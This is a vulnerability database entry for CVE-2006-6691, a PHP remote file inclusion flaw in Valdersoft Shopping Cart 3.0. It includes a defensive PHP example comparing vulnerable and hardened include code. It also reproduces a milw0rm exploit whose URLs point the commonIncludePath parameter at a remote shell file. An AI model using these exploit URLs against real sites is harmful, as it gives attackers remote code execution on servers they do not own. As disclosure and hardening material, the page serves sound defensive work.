Valdersoft Shopping Cart 'Common.PHP' Remote File Inclusion Vulnerability

Vulnerability ID: 1111811    Vulnerability type: Input validation
Published: 2006-12-20    Updated: 2006-12-22
CVE ID: CVE-2006-6691    CNNVD ID: CNNVD-200612-474
Platform: PHP    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/2964
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-474
|Vulnerability details
Valdersoft Shopping Cart 3.0 and earlier contain multiple PHP remote file inclusion vulnerabilities. A remote attacker can execute arbitrary PHP code via a URL supplied in the commonIncludePath parameter of (1) admin/include/common.php, (2) include/common.php, or (3) common_include/common.php.
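As an added illustration (not part of the original advisory and not Valdersoft's code), the include pattern the advisory quotes is shown next to a hardened form that never derives an include path from request data; the directory name, function names and the php.ini note are assumptions:

```php
<?php
// Added example, not the vendor's code. Shows the vulnerable include shape
// the advisory reports and a hardened replacement. Names are assumed.

// VULNERABLE: the include path is read straight from the request. With
// allow_url_include=On, PHP will fetch and execute whatever URL is passed in
// commonIncludePath; with it Off, local path manipulation is still possible.
function vulnerable_include(array $request): void
{
    $commonIncludePath = $request['commonIncludePath'] ?? '';
    include($commonIncludePath . "common.php");
}

// Helper for input validation elsewhere in an app: rejects any value that
// names a stream wrapper (http://, ftp://, php://, data:, expect://, ...),
// contains a traversal sequence, or embeds a NUL byte. Windows drive prefixes
// such as "C:" are also rejected by the scheme check, which is deliberate.
function is_untrusted_include_path(string $value): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $value)) {
        return true;
    }
    if (strpos($value, "\0") !== false || strpos($value, '..') !== false) {
        return true;
    }
    return false;
}

// HARDENED: the base directory is a compile-time constant, the final path is
// resolved with realpath() and checked to lie inside that directory, and the
// request is never consulted. (Assumed directory name.)
const COMMON_INCLUDE_DIR = __DIR__ . '/common_include';

function safe_include_common(): void
{
    $base   = realpath(COMMON_INCLUDE_DIR);
    $target = realpath(COMMON_INCLUDE_DIR . '/common.php');
    // realpath() returns false for missing files and collapses any "../";
    // the prefix check guarantees the resolved file sits under $base.
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(500);
        exit('Configuration error: common.php not found');
    }
    require_once $target;
}

// Defence in depth (php.ini, assumed deployment setting):
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; if the application does not need remote fopen
// Neither replaces fixing the code: a fixed include path is the actual fix.
```

The usage pattern is to call `safe_include_common()` where the original files did `include($commonIncludePath."common.php")`, and to run `is_untrusted_include_path()` on any parameter that legitimately must select a file, combined with an allowlist of permitted names rather than a raw path.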
|Vulnerability exploit
******************************************************************************************************
*Valdersoft Shopping Cart v3.0 (E-Commerce Software)*****[ commonIncludePath ] Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
*******************************************
+Author : mdx                             *
*****************************************************************************
+Files :
*
+/common_include/common.php , /include/common.php, /admin/include/common.php*
*
*
*****************************************************************************
+code  :                                                                    *
+                                                                           *
+    include ( $commonIncludePath."common.php" );                           *
+                                                                           *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/admin/include/common.php?commonIncludePath=http://mdxshell.txt?*+
+********************************************************************************************+
+ http://www.site.***/[path]/include/common.php?commonIncludePath=http://mdxshell.txt?*******+
+********************************************************************************************+
+ http://www.site.***/[path]/common_include/common.php?commonIncludePath=http://mdxshell.txt?+
+********************************************************************************************+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                                                                                            *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   YOUR FEARS ARE ONLY YOUR NIGHTMARES..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        To fear is not to be saved.			     *
*******************                                                                          *
**********************************************************************************************

# milw0rm.com [2006-12-20]
|References

Source: XF
Name: shoppingcart-common-file-include(30984)
Link: http://xforce.iss.net/xforce/xfdb/30984
Source: BID
Name: 21685
Link: http://www.securityfocus.com/bid/21685
Source: MILW0RM
Name: 2964
Link: http://www.milw0rm.com/exploits/2964
Source: VUPEN
Name: ADV-2006-5101
Link: http://www.frsirt.com/english/advisories/2006/5101
Source: SECUNIA
Name: 23464
Link: http://secunia.com/advisories/23464
Source: MILW0RM
Name: 2964
Link: http://milw0rm.com/exploits/2964